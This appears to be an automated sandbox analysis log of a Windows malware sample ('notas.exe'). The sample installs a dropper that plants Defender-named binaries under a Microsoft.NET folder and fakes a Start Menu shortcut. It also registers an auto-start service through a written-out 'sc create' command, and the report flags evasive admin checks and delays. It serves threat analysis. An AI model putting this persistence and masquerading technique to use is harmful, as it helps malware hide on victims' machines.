Source:	Binary string: MsMpEng.pdbGCTL source: MsMpEng.exe.7.dr
Source:	Binary string: OfflineScannerShell.pdbOGPS source: OfflineScannerShell.exe.7.dr
Source:	Binary string: DefenderCSP.pdbGCTL source: DefenderCSP.dll.7.dr

Source: 0219830219301290321012notas.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 0219830219301290321012notas.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 0219830219301290321012notas.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 0219830219301290321012notas.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 0219830219301290321012notas.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: MsMpRes.dll.7.dr

Static PE information: 0x9AF8FAC1 [Wed May 22 16:33:05 2052 UTC]

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Code function: 0_2_00D47326 SetDefaultDllDirectories,LoadLibraryW,GetProcAddress,CoInitialize,InitCommonControlsEx,GetModuleHandleW,GetModuleFileNameW,

0_2_00D47326

Source: MpSvc.dll.3.dr	Static PE information: section name: .didata
Source: NisSrv.exe.7.dr	Static PE information: section name: .didat
Source: ProtectionManagement.dll.7.dr	Static PE information: section name: .didat
Source: MpCmdRun.exe.7.dr	Static PE information: section name: .didat
Source: MpClient.dll.7.dr	Static PE information: section name: _RDATA
Source: MpCmdRun.exe0.7.dr	Static PE information: section name: .didat
Source: MpCmdRun.dll.7.dr	Static PE information: section name: .didata
Source: MpCommu.dll.7.dr	Static PE information: section name: .didat
Source: MpRtp.dll.7.dr	Static PE information: section name: .didat
Source: MpSvc.dll.7.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D4B056 push ecx; ret	0_2_00D4B069
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D5D603 push ecx; ret	0_2_00D5D616
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FFB4B08D2A5 pushad ; iretd	3_2_00007FFB4B08D2A6
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0043D0D8 push ecx; mov dword ptr [esp], eax	4_2_0043D0D9
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_004100B0 push 00410133h; ret	4_2_0041012B
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040F344 push ecx; mov dword ptr [esp], edx	4_2_0040F345
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_00407320 push ecx; mov dword ptr [esp], eax	4_2_00407321
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_004245FC push ecx; mov dword ptr [esp], ecx	4_2_00424600
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0063586C push 006358B2h; ret	4_2_006358AA
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040F95C push ecx; mov dword ptr [esp], edx	4_2_0040F95D
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040F968 push ecx; mov dword ptr [esp], edx	4_2_0040F969
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040F974 push ecx; mov dword ptr [esp], edx	4_2_0040F975
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040F9E0 push ecx; mov dword ptr [esp], edx	4_2_0040F9E1
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040F9BA push ecx; mov dword ptr [esp], edx	4_2_0040F9BD
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_00425A54 push ecx; mov dword ptr [esp], ecx	4_2_00425A58
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040FA02 push ecx; mov dword ptr [esp], edx	4_2_0040FA05
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_00425A18 push ecx; mov dword ptr [esp], ecx	4_2_00425A1B
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040FAF4 push ecx; mov dword ptr [esp], edx	4_2_0040FAF5
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040FB0C push ecx; mov dword ptr [esp], edx	4_2_0040FB0D
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_004FBC54 push ecx; mov dword ptr [esp], eax	4_2_004FBC58
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_004D3CB8 push ecx; mov dword ptr [esp], edx	4_2_004D3CB9
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0043FCBC push ecx; mov dword ptr [esp], eax	4_2_0043FCBD
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_004FBF8C push ecx; mov dword ptr [esp], eax	4_2_004FBF8E
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0063586C push 006358B2h; ret	7_2_006358AA
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_004FBC54 push ecx; mov dword ptr [esp], eax	7_2_004FBC58
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0043D0D8 push ecx; mov dword ptr [esp], eax	7_2_0043D0D9
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_004100B0 push 00410133h; ret	7_2_0041012B
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0040F344 push ecx; mov dword ptr [esp], edx	7_2_0040F345
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_00407320 push ecx; mov dword ptr [esp], eax	7_2_00407321
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_004245FC push ecx; mov dword ptr [esp], ecx	7_2_00424600
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0040F95C push ecx; mov dword ptr [esp], edx	7_2_0040F95D

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpRtp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\EppManifest.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpDetours.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\MpSvc.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpSvc.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\shellext.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	File created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpOAV.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\ContentPack\Update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpProvider.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpCommu.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpClient.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\NisSrv.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log

Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation\Microsoft Malware Protection.lnk			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_005E0E10 IsIconic,	4_2_005E0E10
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_005E0E94 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	4_2_005E0E94
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_005E0E10 IsIconic,	7_2_005E0E10
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_005E0E94 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,	7_2_005E0E94

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain checking for user administrative privileges

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

Check user administrative privileges: IsUserAndAdmin, DecisionNode

graph_4-11038

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

Stalling execution: Execution stalls by calling Sleep

graph_7-11869

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Memory allocated: E40000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Memory allocated: 1A7F0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Code function: 3_2_00007FFB4B1C14B5 rdtsc

3_2_00007FFB4B1C14B5

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Window / User API: threadDelayed 1811			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Window / User API: threadDelayed 1004			Jump to behavior

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.mui	Jump to dropped file
